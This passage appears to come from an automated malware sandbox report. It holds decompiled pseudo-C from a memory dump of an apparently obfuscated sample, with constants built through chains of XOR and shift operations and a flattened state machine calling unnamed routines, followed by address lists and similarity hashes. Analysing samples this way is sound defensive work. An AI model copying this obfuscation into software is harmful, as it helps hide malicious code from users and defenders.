                                                                                                                                                                                                                    				_v2692 = _v2692 >> 0xc;
                                                                                                                                                                                                                    				_v2692 = _v2692 * 0x44;
                                                                                                                                                                                                                    				_v2692 = _v2692 ^ 0x000c1f20;
                                                                                                                                                                                                                    				_v2652 = 0x350d6a;
                                                                                                                                                                                                                    				_v2652 = _v2652 >> 4;
                                                                                                                                                                                                                    				_v2652 = _v2652 ^ 0x0002a2c3;
                                                                                                                                                                                                                    				_v2708 = 0xa90ea7;
                                                                                                                                                                                                                    				_v2708 = _v2708 << 4;
                                                                                                                                                                                                                    				_v2708 = _v2708 << 7;
                                                                                                                                                                                                                    				_v2708 = _v2708 ^ 0x487a2961;
                                                                                                                                                                                                                    				_v2648 = 0x287f14;
                                                                                                                                                                                                                    				_v2648 = _v2648 | 0x2c89031b;
                                                                                                                                                                                                                    				_v2648 = _v2648 ^ 0x2cad0164;
                                                                                                                                                                                                                    				_v2764 = 0xb7532d;
                                                                                                                                                                                                                    				_v2764 = _v2764 >> 0xf;
                                                                                                                                                                                                                    				_v2764 = _v2764 ^ 0xb3c6c311;
                                                                                                                                                                                                                    				_v2764 = _v2764 | 0x5ee36d4a;
                                                                                                                                                                                                                    				_v2764 = _v2764 ^ 0xffe65214;
                                                                                                                                                                                                                    				_v2676 = 0xe37b39;
                                                                                                                                                                                                                    				_v2676 = _v2676 | 0x76efff13;
                                                                                                                                                                                                                    				_v2676 = _v2676 ^ 0x76e66698;
                                                                                                                                                                                                                    				_v2772 = 0x6aa562;
                                                                                                                                                                                                                    				_v2772 = _v2772 >> 6;
                                                                                                                                                                                                                    				_v2772 = _v2772 >> 2;
                                                                                                                                                                                                                    				_v2772 = _v2772 ^ 0x92c36af6;
                                                                                                                                                                                                                    				_v2772 = _v2772 ^ 0x92cf71bb;
                                                                                                                                                                                                                    				_v2632 = 0x6ae5a1;
                                                                                                                                                                                                                    				_v2632 = _v2632 + 0xad65;
                                                                                                                                                                                                                    				_v2632 = _v2632 ^ 0x006fbc70;
                                                                                                                                                                                                                    				_v2748 = 0x40288e;
                                                                                                                                                                                                                    				_v2748 = _v2748 ^ 0x093e33c4;
                                                                                                                                                                                                                    				_v2748 = _v2748 + 0xa746;
                                                                                                                                                                                                                    				_t459 = 0xb;
                                                                                                                                                                                                                    				_v2748 = _v2748 / _t459;
                                                                                                                                                                                                                    				_v2748 = _v2748 ^ 0x00dba074;
                                                                                                                                                                                                                    				_v2640 = 0x77bb00;
                                                                                                                                                                                                                    				_v2640 = _v2640 ^ 0x03b997ee;
                                                                                                                                                                                                                    				_v2640 = _v2640 ^ 0x03cb7d95;
                                                                                                                                                                                                                    				_v2756 = 0x91ced7;
                                                                                                                                                                                                                    				_t460 = 0x25;
                                                                                                                                                                                                                    				_v2756 = _v2756 * 0x3c;
                                                                                                                                                                                                                    				_v2756 = _v2756 + 0xffff5484;
                                                                                                                                                                                                                    				_v2756 = _v2756 << 7;
                                                                                                                                                                                                                    				_v2756 = _v2756 ^ 0x15e2973c;
                                                                                                                                                                                                                    				_v2732 = 0x274ff4;
                                                                                                                                                                                                                    				_v2732 = _v2732 + 0xffffbb63;
                                                                                                                                                                                                                    				_v2732 = _v2732 | 0x7c481ed5;
                                                                                                                                                                                                                    				_v2732 = _v2732 >> 0xd;
                                                                                                                                                                                                                    				_v2732 = _v2732 ^ 0x0009d536;
                                                                                                                                                                                                                    				_v2624 = 0x4d6760;
                                                                                                                                                                                                                    				_v2624 = _v2624 ^ 0xddb56998;
                                                                                                                                                                                                                    				_v2624 = _v2624 ^ 0xddfe34c8;
                                                                                                                                                                                                                    				_v2740 = 0x6d9b89;
                                                                                                                                                                                                                    				_v2740 = _v2740 ^ 0x318369b5;
                                                                                                                                                                                                                    				_v2740 = _v2740 | 0x61f1422e;
                                                                                                                                                                                                                    				_v2740 = _v2740 + 0xffffeb58;
                                                                                                                                                                                                                    				_v2740 = _v2740 ^ 0x71f1c992;
                                                                                                                                                                                                                    				_v2660 = 0x703a31;
                                                                                                                                                                                                                    				_v2660 = _v2660 + 0xffff2363;
                                                                                                                                                                                                                    				_v2660 = _v2660 + 0xa1ef;
                                                                                                                                                                                                                    				_v2660 = _v2660 ^ 0x00664f73;
                                                                                                                                                                                                                    				_v2668 = 0x799a8b;
                                                                                                                                                                                                                    				_v2668 = _v2668 >> 3;
                                                                                                                                                                                                                    				_v2668 = _v2668 >> 5;
                                                                                                                                                                                                                    				_v2668 = _v2668 ^ 0x00082851;
                                                                                                                                                                                                                    				_v2716 = 0xbcf972;
                                                                                                                                                                                                                    				_v2716 = _v2716 / _t460;
                                                                                                                                                                                                                    				_v2716 = _v2716 + 0x4b49;
                                                                                                                                                                                                                    				_v2716 = _v2716 + 0xffff5ff1;
                                                                                                                                                                                                                    				_v2716 = _v2716 ^ 0x0000ea66;
                                                                                                                                                                                                                    				_v2724 = 0x581364;
                                                                                                                                                                                                                    				_v2724 = _v2724 ^ 0x4cc27369;
                                                                                                                                                                                                                    				_v2724 = _v2724 << 0xd;
                                                                                                                                                                                                                    				_t461 = 0x74;
                                                                                                                                                                                                                    				_t427 = _v2724 / _t461;
                                                                                                                                                                                                                    				_v2724 = _t427;
                                                                                                                                                                                                                    				_v2724 = _v2724 ^ 0x00afd360;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(_t508 != 0x9400104) {
                                                                                                                                                                                                                    						if(_t508 != 0xcc4e497) {
                                                                                                                                                                                                                    							_t519 = _t508 - 0xd7ba76a;
                                                                                                                                                                                                                    							if(_t508 == 0xd7ba76a) {
                                                                                                                                                                                                                    								_t344 =  &_v2708; // 0x487a2961
                                                                                                                                                                                                                    								E00A7E4D8(_v2684, _v2692, _t461, _t461, _v2652, _t461, _v2712,  &_v1040,  *_t344);
                                                                                                                                                                                                                    								_push(_v2772);
                                                                                                                                                                                                                    								_push(_v2676);
                                                                                                                                                                                                                    								_push(_v2764);
                                                                                                                                                                                                                    								E00A7E773(_v2748, _t519,  &_v2080, _v2640, 0xa612d4,  &_v520, E00A81E60(0xa612d4, _v2648, _t519),  &_v1040, _v2756);
                                                                                                                                                                                                                    								E00A7D6DF(_v2732, _t441, _v2624, _v2740);
                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                    								_push(_v2724);
                                                                                                                                                                                                                    								_push( &_v520);
                                                                                                                                                                                                                    								_push(_v2716);
                                                                                                                                                                                                                    								_push(_v2668);
                                                                                                                                                                                                                    								return E00A7E05C(_v2660, 0);
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							goto L9;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						E00A6D804(_v2728, _v2768,  &_v2600, _t461, _v2704, _v2700);
                                                                                                                                                                                                                    						 *((short*)(E00A75011( &_v2600, _v2604, _v2644))) = 0;
                                                                                                                                                                                                                    						E00A6F1F6(_v2696,  &_v1560, __eflags, _v2760, _v2680);
                                                                                                                                                                                                                    						_push(_v2656);
                                                                                                                                                                                                                    						_push(_v2736);
                                                                                                                                                                                                                    						_push(_v2752);
                                                                                                                                                                                                                    						E00A7E773(_v2744, __eflags,  &_v1560, _v2720, 0xa61284,  &_v2080, E00A81E60(0xa61284, _v2608, __eflags),  &_v2600, _v2636);
                                                                                                                                                                                                                    						E00A7D6DF(_v2672, _t432, _v2688, _v2664);
                                                                                                                                                                                                                    						_t461 = _t507;
                                                                                                                                                                                                                    						_t427 = E00A7C400(_t507, _v2620,  &_v2080, _v2612, _v2628);
                                                                                                                                                                                                                    						_t512 =  &(_t512[0x16]);
                                                                                                                                                                                                                    						__eflags = _t427;
                                                                                                                                                                                                                    						if(_t427 != 0) {
                                                                                                                                                                                                                    							_t508 = 0xd7ba76a;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						return _t427;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_t508 = 0xcc4e497;
                                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                                    					__eflags = _t508 - 0xde7d95a;
                                                                                                                                                                                                                    				} while (_t508 != 0xde7d95a);
                                                                                                                                                                                                                    				return _t427;
                                                                                                                                                                                                                    			}
































































                                                                                                                                                                                                                    0x00a64d6b
                                                                                                                                                                                                                    0x00a64d71
                                                                                                                                                                                                                    0x00a64d7b
                                                                                                                                                                                                                    0x00a64d83
                                                                                                                                                                                                                    0x00a64d8b
                                                                                                                                                                                                                    0x00a64d93
                                                                                                                                                                                                                    0x00a64d9b
                                                                                                                                                                                                                    0x00a64da3
                                                                                                                                                                                                                    0x00a64db4
                                                                                                                                                                                                                    0x00a64db8
                                                                                                                                                                                                                    0x00a64dba
                                                                                                                                                                                                                    0x00a64dc2
                                                                                                                                                                                                                    0x00a64dc7
                                                                                                                                                                                                                    0x00a64dcf
                                                                                                                                                                                                                    0x00a64dd4
                                                                                                                                                                                                                    0x00a64de2
                                                                                                                                                                                                                    0x00a64de7
                                                                                                                                                                                                                    0x00a64ded
                                                                                                                                                                                                                    0x00a64df5
                                                                                                                                                                                                                    0x00a64dfd
                                                                                                                                                                                                                    0x00a64e06
                                                                                                                                                                                                                    0x00a64e0b
                                                                                                                                                                                                                    0x00a64e11
                                                                                                                                                                                                                    0x00a64e19
                                                                                                                                                                                                                    0x00a64e21
                                                                                                                                                                                                                    0x00a64e26
                                                                                                                                                                                                                    0x00a64e2e
                                                                                                                                                                                                                    0x00a64e36
                                                                                                                                                                                                                    0x00a64e48
                                                                                                                                                                                                                    0x00a64e4d
                                                                                                                                                                                                                    0x00a64e56
                                                                                                                                                                                                                    0x00a64e61
                                                                                                                                                                                                                    0x00a64e73
                                                                                                                                                                                                                    0x00a64e76
                                                                                                                                                                                                                    0x00a64e7d
                                                                                                                                                                                                                    0x00a64e88
                                                                                                                                                                                                                    0x00a64e90
                                                                                                                                                                                                                    0x00a64e9a
                                                                                                                                                                                                                    0x00a64e9e
                                                                                                                                                                                                                    0x00a64ea6
                                                                                                                                                                                                                    0x00a64eae
                                                                                                                                                                                                                    0x00a64eb6
                                                                                                                                                                                                                    0x00a64ebb
                                                                                                                                                                                                                    0x00a64ec3
                                                                                                                                                                                                                    0x00a64ecb
                                                                                                                                                                                                                    0x00a64ed3
                                                                                                                                                                                                                    0x00a64edb
                                                                                                                                                                                                                    0x00a64ee3
                                                                                                                                                                                                                    0x00a64eeb
                                                                                                                                                                                                                    0x00a64ef6
                                                                                                                                                                                                                    0x00a64efe
                                                                                                                                                                                                                    0x00a64f09
                                                                                                                                                                                                                    0x00a64f11
                                                                                                                                                                                                                    0x00a64f16
                                                                                                                                                                                                                    0x00a64f1e
                                                                                                                                                                                                                    0x00a64f26
                                                                                                                                                                                                                    0x00a64f2e
                                                                                                                                                                                                                    0x00a64f36
                                                                                                                                                                                                                    0x00a64f46
                                                                                                                                                                                                                    0x00a64f4b
                                                                                                                                                                                                                    0x00a64f4f
                                                                                                                                                                                                                    0x00a64f57
                                                                                                                                                                                                                    0x00a64f62
                                                                                                                                                                                                                    0x00a64f6a
                                                                                                                                                                                                                    0x00a64f75
                                                                                                                                                                                                                    0x00a64f80
                                                                                                                                                                                                                    0x00a64f8b
                                                                                                                                                                                                                    0x00a64f96
                                                                                                                                                                                                                    0x00a64f9e
                                                                                                                                                                                                                    0x00a64fa3
                                                                                                                                                                                                                    0x00a64fb2
                                                                                                                                                                                                                    0x00a64fb5
                                                                                                                                                                                                                    0x00a64fb9
                                                                                                                                                                                                                    0x00a64fc1
                                                                                                                                                                                                                    0x00a64fc9
                                                                                                                                                                                                                    0x00a64fd6
                                                                                                                                                                                                                    0x00a64fda
                                                                                                                                                                                                                    0x00a64fe2
                                                                                                                                                                                                                    0x00a64fea
                                                                                                                                                                                                                    0x00a64ff5
                                                                                                                                                                                                                    0x00a65000
                                                                                                                                                                                                                    0x00a6500b
                                                                                                                                                                                                                    0x00a6501b
                                                                                                                                                                                                                    0x00a6501f
                                                                                                                                                                                                                    0x00a65024
                                                                                                                                                                                                                    0x00a6502c
                                                                                                                                                                                                                    0x00a65034
                                                                                                                                                                                                                    0x00a65039
                                                                                                                                                                                                                    0x00a65041
                                                                                                                                                                                                                    0x00a65049
                                                                                                                                                                                                                    0x00a65054
                                                                                                                                                                                                                    0x00a65066
                                                                                                                                                                                                                    0x00a6506b
                                                                                                                                                                                                                    0x00a6506f
                                                                                                                                                                                                                    0x00a65077
                                                                                                                                                                                                                    0x00a6508b
                                                                                                                                                                                                                    0x00a65092
                                                                                                                                                                                                                    0x00a6509d
                                                                                                                                                                                                                    0x00a650a8
                                                                                                                                                                                                                    0x00a650b0
                                                                                                                                                                                                                    0x00a650bb
                                                                                                                                                                                                                    0x00a650c6
                                                                                                                                                                                                                    0x00a650d1
                                                                                                                                                                                                                    0x00a650dc
                                                                                                                                                                                                                    0x00a650e4
                                                                                                                                                                                                                    0x00a650f1
                                                                                                                                                                                                                    0x00a650f5
                                                                                                                                                                                                                    0x00a650fd
                                                                                                                                                                                                                    0x00a65105
                                                                                                                                                                                                                    0x00a6510f
                                                                                                                                                                                                                    0x00a65113
                                                                                                                                                                                                                    0x00a6511b
                                                                                                                                                                                                                    0x00a65126
                                                                                                                                                                                                                    0x00a6512e
                                                                                                                                                                                                                    0x00a65139
                                                                                                                                                                                                                    0x00a65141
                                                                                                                                                                                                                    0x00a65146
                                                                                                                                                                                                                    0x00a6514b
                                                                                                                                                                                                                    0x00a65153
                                                                                                                                                                                                                    0x00a6515e
                                                                                                                                                                                                                    0x00a65169
                                                                                                                                                                                                                    0x00a65174
                                                                                                                                                                                                                    0x00a6517c
                                                                                                                                                                                                                    0x00a65183
                                                                                                                                                                                                                    0x00a65190
                                                                                                                                                                                                                    0x00a6519d
                                                                                                                                                                                                                    0x00a651a5
                                                                                                                                                                                                                    0x00a651ad
                                                                                                                                                                                                                    0x00a651b5
                                                                                                                                                                                                                    0x00a651bd
                                                                                                                                                                                                                    0x00a651c5
                                                                                                                                                                                                                    0x00a651ca
                                                                                                                                                                                                                    0x00a651cf
                                                                                                                                                                                                                    0x00a651d7
                                                                                                                                                                                                                    0x00a651df
                                                                                                                                                                                                                    0x00a651ea
                                                                                                                                                                                                                    0x00a651f5
                                                                                                                                                                                                                    0x00a65200
                                                                                                                                                                                                                    0x00a65208
                                                                                                                                                                                                                    0x00a65210
                                                                                                                                                                                                                    0x00a6521e
                                                                                                                                                                                                                    0x00a65223
                                                                                                                                                                                                                    0x00a65229
                                                                                                                                                                                                                    0x00a65231
                                                                                                                                                                                                                    0x00a6523c
                                                                                                                                                                                                                    0x00a65247
                                                                                                                                                                                                                    0x00a65252
                                                                                                                                                                                                                    0x00a6525f
                                                                                                                                                                                                                    0x00a65262
                                                                                                                                                                                                                    0x00a65266
                                                                                                                                                                                                                    0x00a6526e
                                                                                                                                                                                                                    0x00a65273
                                                                                                                                                                                                                    0x00a6527b
                                                                                                                                                                                                                    0x00a65283
                                                                                                                                                                                                                    0x00a6528b
                                                                                                                                                                                                                    0x00a65293
                                                                                                                                                                                                                    0x00a65298
                                                                                                                                                                                                                    0x00a652a0
                                                                                                                                                                                                                    0x00a652ab
                                                                                                                                                                                                                    0x00a652b6
                                                                                                                                                                                                                    0x00a652c1
                                                                                                                                                                                                                    0x00a652c9
                                                                                                                                                                                                                    0x00a652d1
                                                                                                                                                                                                                    0x00a652d9
                                                                                                                                                                                                                    0x00a652e1
                                                                                                                                                                                                                    0x00a652e9
                                                                                                                                                                                                                    0x00a652f4
                                                                                                                                                                                                                    0x00a652ff
                                                                                                                                                                                                                    0x00a6530a
                                                                                                                                                                                                                    0x00a65315
                                                                                                                                                                                                                    0x00a6531d
                                                                                                                                                                                                                    0x00a65322
                                                                                                                                                                                                                    0x00a65327
                                                                                                                                                                                                                    0x00a6532f
                                                                                                                                                                                                                    0x00a6533f
                                                                                                                                                                                                                    0x00a65343
                                                                                                                                                                                                                    0x00a6534b
                                                                                                                                                                                                                    0x00a65353
                                                                                                                                                                                                                    0x00a6535b
                                                                                                                                                                                                                    0x00a65363
                                                                                                                                                                                                                    0x00a6536b
                                                                                                                                                                                                                    0x00a65374
                                                                                                                                                                                                                    0x00a65375
                                                                                                                                                                                                                    0x00a65377
                                                                                                                                                                                                                    0x00a6537b
                                                                                                                                                                                                                    0x00a65383
                                                                                                                                                                                                                    0x00a65383
                                                                                                                                                                                                                    0x00a65391
                                                                                                                                                                                                                    0x00a65397
                                                                                                                                                                                                                    0x00a65399
                                                                                                                                                                                                                    0x00a6539f
                                                                                                                                                                                                                    0x00a653c4
                                                                                                                                                                                                                    0x00a653c9
                                                                                                                                                                                                                    0x00a653d2
                                                                                                                                                                                                                    0x00a653d9
                                                                                                                                                                                                                    0x00a6541e
                                                                                                                                                                                                                    0x00a65434
                                                                                                                                                                                                                    0x00a6543b
                                                                                                                                                                                                                    0x00a6543c
                                                                                                                                                                                                                    0x00a6543d
                                                                                                                                                                                                                    0x00a6543e
                                                                                                                                                                                                                    0x00a65449
                                                                                                                                                                                                                    0x00a6544a
                                                                                                                                                                                                                    0x00a65451
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a65464
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a65399
                                                                                                                                                                                                                    0x00a6548b
                                                                                                                                                                                                                    0x00a654be
                                                                                                                                                                                                                    0x00a654c5
                                                                                                                                                                                                                    0x00a654ca
                                                                                                                                                                                                                    0x00a654d6
                                                                                                                                                                                                                    0x00a654da
                                                                                                                                                                                                                    0x00a6551f
                                                                                                                                                                                                                    0x00a6553b
                                                                                                                                                                                                                    0x00a6554e
                                                                                                                                                                                                                    0x00a6555f
                                                                                                                                                                                                                    0x00a65564
                                                                                                                                                                                                                    0x00a65567
                                                                                                                                                                                                                    0x00a65569
                                                                                                                                                                                                                    0x00a6556f
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6556f
                                                                                                                                                                                                                    0x00a65471
                                                                                                                                                                                                                    0x00a65471
                                                                                                                                                                                                                    0x00a65576
                                                                                                                                                                                                                    0x00a65578
                                                                                                                                                                                                                    0x00a65578
                                                                                                                                                                                                                    0x00a65578
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: %x$9{$@Ak}$B*j$Jm^$Qs$`gM$a)zHf$f$j5$o$sOf$kb
                                                                                                                                                                                                                    • API String ID: 0-2773993451
                                                                                                                                                                                                                    • Opcode ID: b3e132874f6bfcdf282d0a773b2428f99c5f82070f24b7b3725c3a0755a43386
                                                                                                                                                                                                                    • Instruction ID: 0768e4a33c9b807892f7084d3325f14563682d953674e4ffd8de38617b85396e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3e132874f6bfcdf282d0a773b2428f99c5f82070f24b7b3725c3a0755a43386
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8512F0725083819FD368CF21C98AA9BFBF2BBC5748F10891DE5D986260D7B18949CF47
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                                                                                                    			E00A6F443() {
                                                                                                                                                                                                                    				char _v520;
                                                                                                                                                                                                                    				char _v1040;
                                                                                                                                                                                                                    				char _v1560;
                                                                                                                                                                                                                    				intOrPtr* _v1564;
                                                                                                                                                                                                                    				intOrPtr* _v1568;
                                                                                                                                                                                                                    				intOrPtr _v1572;
                                                                                                                                                                                                                    				signed int _v1576;
                                                                                                                                                                                                                    				signed int _v1580;
                                                                                                                                                                                                                    				signed int _v1584;
                                                                                                                                                                                                                    				signed int _v1588;
                                                                                                                                                                                                                    				intOrPtr* _v1592;
                                                                                                                                                                                                                    				signed int _v1596;
                                                                                                                                                                                                                    				signed int _v1600;
                                                                                                                                                                                                                    				signed int _v1604;
                                                                                                                                                                                                                    				signed int _v1608;
                                                                                                                                                                                                                    				signed int _v1612;
                                                                                                                                                                                                                    				signed int _v1616;
                                                                                                                                                                                                                    				signed int _v1620;
                                                                                                                                                                                                                    				signed int _v1624;
                                                                                                                                                                                                                    				signed int _v1628;
                                                                                                                                                                                                                    				signed int _v1632;
                                                                                                                                                                                                                    				signed int _v1636;
                                                                                                                                                                                                                    				signed int _v1640;
                                                                                                                                                                                                                    				signed int _v1644;
                                                                                                                                                                                                                    				signed int _v1648;
                                                                                                                                                                                                                    				signed int _v1652;
                                                                                                                                                                                                                    				signed int _v1656;
                                                                                                                                                                                                                    				signed int _v1660;
                                                                                                                                                                                                                    				signed int _v1664;
                                                                                                                                                                                                                    				signed int _v1668;
                                                                                                                                                                                                                    				signed int _v1672;
                                                                                                                                                                                                                    				signed int _v1676;
                                                                                                                                                                                                                    				signed int _v1680;
                                                                                                                                                                                                                    				signed int _v1684;
                                                                                                                                                                                                                    				signed int _v1688;
                                                                                                                                                                                                                    				signed int _v1692;
                                                                                                                                                                                                                    				signed int _v1696;
                                                                                                                                                                                                                    				signed int _v1700;
                                                                                                                                                                                                                    				signed int _v1704;
                                                                                                                                                                                                                    				signed int _v1708;
                                                                                                                                                                                                                    				signed int _v1712;
                                                                                                                                                                                                                    				signed int _v1716;
                                                                                                                                                                                                                    				signed int _v1720;
                                                                                                                                                                                                                    				signed int _v1724;
                                                                                                                                                                                                                    				signed int _v1728;
                                                                                                                                                                                                                    				signed int _v1732;
                                                                                                                                                                                                                    				signed int _v1736;
                                                                                                                                                                                                                    				signed int _v1740;
                                                                                                                                                                                                                    				signed int _v1744;
                                                                                                                                                                                                                    				signed int _v1748;
                                                                                                                                                                                                                    				signed int _v1752;
                                                                                                                                                                                                                    				signed int _v1756;
                                                                                                                                                                                                                    				signed int _v1760;
                                                                                                                                                                                                                    				signed int _v1764;
                                                                                                                                                                                                                    				signed int _v1768;
                                                                                                                                                                                                                    				void* _t471;
                                                                                                                                                                                                                    				intOrPtr* _t476;
                                                                                                                                                                                                                    				void* _t477;
                                                                                                                                                                                                                    				intOrPtr _t488;
                                                                                                                                                                                                                    				signed int _t489;
                                                                                                                                                                                                                    				signed int _t490;
                                                                                                                                                                                                                    				void* _t492;
                                                                                                                                                                                                                    				signed int _t541;
                                                                                                                                                                                                                    				signed int _t542;
                                                                                                                                                                                                                    				signed int _t543;
                                                                                                                                                                                                                    				signed int _t544;
                                                                                                                                                                                                                    				signed int _t545;
                                                                                                                                                                                                                    				signed int _t546;
                                                                                                                                                                                                                    				intOrPtr _t547;
                                                                                                                                                                                                                    				intOrPtr* _t549;
                                                                                                                                                                                                                    				intOrPtr* _t550;
                                                                                                                                                                                                                    				signed int _t553;
                                                                                                                                                                                                                    				signed int* _t555;
                                                                                                                                                                                                                    				void* _t557;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t555 =  &_v1768;
                                                                                                                                                                                                                    				_v1572 = 0xe1da2d;
                                                                                                                                                                                                                    				_t550 = 0;
                                                                                                                                                                                                                    				_t492 = 0x6a095f4;
                                                                                                                                                                                                                    				_v1568 = 0;
                                                                                                                                                                                                                    				_v1564 = 0;
                                                                                                                                                                                                                    				_v1720 = 0x8bb2a3;
                                                                                                                                                                                                                    				_v1720 = _v1720 | 0xf7ffffdf;
                                                                                                                                                                                                                    				_v1720 = _v1720 ^ 0xf7ffffd6;
                                                                                                                                                                                                                    				_v1680 = 0xce684;
                                                                                                                                                                                                                    				_v1680 = _v1680 + 0x4ca0;
                                                                                                                                                                                                                    				_v1680 = _v1680 + 0xb630;
                                                                                                                                                                                                                    				_v1680 = _v1680 ^ 0x0002e96b;
                                                                                                                                                                                                                    				_v1736 = 0xcd5bc7;
                                                                                                                                                                                                                    				_t553 = 0x4c;
                                                                                                                                                                                                                    				_v1736 = _v1736 / _t553;
                                                                                                                                                                                                                    				_v1736 = _v1736 | 0xdc779b3c;
                                                                                                                                                                                                                    				_v1736 = _v1736 >> 1;
                                                                                                                                                                                                                    				_v1736 = _v1736 ^ 0x6e3bdddd;
                                                                                                                                                                                                                    				_v1628 = 0xf06b05;
                                                                                                                                                                                                                    				_v1628 = _v1628 >> 6;
                                                                                                                                                                                                                    				_v1628 = _v1628 ^ 0x0003c1ae;
                                                                                                                                                                                                                    				_v1768 = 0x6b2d46;
                                                                                                                                                                                                                    				_v1768 = _v1768 + 0xffffbcd4;
                                                                                                                                                                                                                    				_v1768 = _v1768 | 0x57cfbfef;
                                                                                                                                                                                                                    				_v1768 = _v1768 ^ 0x57efffff;
                                                                                                                                                                                                                    				_v1604 = 0x74fcfc;
                                                                                                                                                                                                                    				_v1604 = _v1604 >> 9;
                                                                                                                                                                                                                    				_v1604 = _v1604 ^ 0x00003a6e;
                                                                                                                                                                                                                    				_v1712 = 0x8652eb;
                                                                                                                                                                                                                    				_t489 = 0x5c;
                                                                                                                                                                                                                    				_t541 = 0x45;
                                                                                                                                                                                                                    				_v1592 = 0;
                                                                                                                                                                                                                    				_v1712 = _v1712 * 0xb;
                                                                                                                                                                                                                    				_v1712 = _v1712 | 0xd14ea7ea;
                                                                                                                                                                                                                    				_v1712 = _v1712 * 0x42;
                                                                                                                                                                                                                    				_v1712 = _v1712 ^ 0x1f89af97;
                                                                                                                                                                                                                    				_v1624 = 0x1f63dd;
                                                                                                                                                                                                                    				_v1624 = _v1624 ^ 0xe9c77195;
                                                                                                                                                                                                                    				_v1624 = _v1624 ^ 0xe9d1a2a9;
                                                                                                                                                                                                                    				_v1660 = 0x450f10;
                                                                                                                                                                                                                    				_v1660 = _v1660 >> 0xb;
                                                                                                                                                                                                                    				_v1660 = _v1660 << 3;
                                                                                                                                                                                                                    				_v1660 = _v1660 ^ 0x000031f8;
                                                                                                                                                                                                                    				_v1632 = 0x4fe25a;
                                                                                                                                                                                                                    				_v1632 = _v1632 | 0xbf7caa8a;
                                                                                                                                                                                                                    				_v1632 = _v1632 ^ 0xbf756bbe;
                                                                                                                                                                                                                    				_v1620 = 0xd0bc31;
                                                                                                                                                                                                                    				_v1620 = _v1620 >> 0xf;
                                                                                                                                                                                                                    				_v1620 = _v1620 ^ 0x0002c102;
                                                                                                                                                                                                                    				_v1756 = 0x1a9984;
                                                                                                                                                                                                                    				_v1756 = _v1756 + 0x2f90;
                                                                                                                                                                                                                    				_v1756 = _v1756 + 0xffffef18;
                                                                                                                                                                                                                    				_v1756 = _v1756 << 6;
                                                                                                                                                                                                                    				_v1756 = _v1756 ^ 0x06aa8f59;
                                                                                                                                                                                                                    				_v1700 = 0xfb6344;
                                                                                                                                                                                                                    				_v1700 = _v1700 / _t489;
                                                                                                                                                                                                                    				_v1700 = _v1700 / _t541;
                                                                                                                                                                                                                    				_v1700 = _v1700 | 0x2b535769;
                                                                                                                                                                                                                    				_v1700 = _v1700 ^ 0x2b5afbd4;
                                                                                                                                                                                                                    				_v1764 = 0x2e64c8;
                                                                                                                                                                                                                    				_v1764 = _v1764 * 0x36;
                                                                                                                                                                                                                    				_v1764 = _v1764 + 0xa572;
                                                                                                                                                                                                                    				_v1764 = _v1764 | 0xae2924a6;
                                                                                                                                                                                                                    				_v1764 = _v1764 ^ 0xafe5505b;
                                                                                                                                                                                                                    				_v1672 = 0x6a90eb;
                                                                                                                                                                                                                    				_t490 = 0x44;
                                                                                                                                                                                                                    				_v1672 = _v1672 * 0x23;
                                                                                                                                                                                                                    				_v1672 = _v1672 << 6;
                                                                                                                                                                                                                    				_v1672 = _v1672 ^ 0xa4729a2c;
                                                                                                                                                                                                                    				_v1708 = 0x1526a7;
                                                                                                                                                                                                                    				_v1708 = _v1708 << 2;
                                                                                                                                                                                                                    				_v1708 = _v1708 | 0x748de5c4;
                                                                                                                                                                                                                    				_v1708 = _v1708 << 0xe;
                                                                                                                                                                                                                    				_v1708 = _v1708 ^ 0x7ffd5eef;
                                                                                                                                                                                                                    				_v1636 = 0x8d0501;
                                                                                                                                                                                                                    				_v1636 = _v1636 >> 4;
                                                                                                                                                                                                                    				_v1636 = _v1636 ^ 0x00045ee4;
                                                                                                                                                                                                                    				_v1580 = 0x529891;
                                                                                                                                                                                                                    				_v1580 = _v1580 | 0x1e8fcd7b;
                                                                                                                                                                                                                    				_v1580 = _v1580 ^ 0x1ed05383;
                                                                                                                                                                                                                    				_v1644 = 0x7a40d1;
                                                                                                                                                                                                                    				_v1644 = _v1644 << 2;
                                                                                                                                                                                                                    				_v1644 = _v1644 ^ 0x01ef26da;
                                                                                                                                                                                                                    				_v1748 = 0xb97086;
                                                                                                                                                                                                                    				_v1748 = _v1748 << 0xa;
                                                                                                                                                                                                                    				_v1748 = _v1748 + 0xfffffaa5;
                                                                                                                                                                                                                    				_v1748 = _v1748 + 0xffff5370;
                                                                                                                                                                                                                    				_v1748 = _v1748 ^ 0xe5ce0f62;
                                                                                                                                                                                                                    				_v1724 = 0x7e1309;
                                                                                                                                                                                                                    				_v1724 = _v1724 / _t490;
                                                                                                                                                                                                                    				_v1724 = _v1724 ^ 0x6b1a81d4;
                                                                                                                                                                                                                    				_v1724 = _v1724 ^ 0xee13c8c6;
                                                                                                                                                                                                                    				_v1724 = _v1724 ^ 0x8501be29;
                                                                                                                                                                                                                    				_v1716 = 0xce9076;
                                                                                                                                                                                                                    				_v1716 = _v1716 >> 0xe;
                                                                                                                                                                                                                    				_v1716 = _v1716 + 0xffff8cd4;
                                                                                                                                                                                                                    				_v1716 = _v1716 * 0x1c;
                                                                                                                                                                                                                    				_v1716 = _v1716 ^ 0xfffd0480;
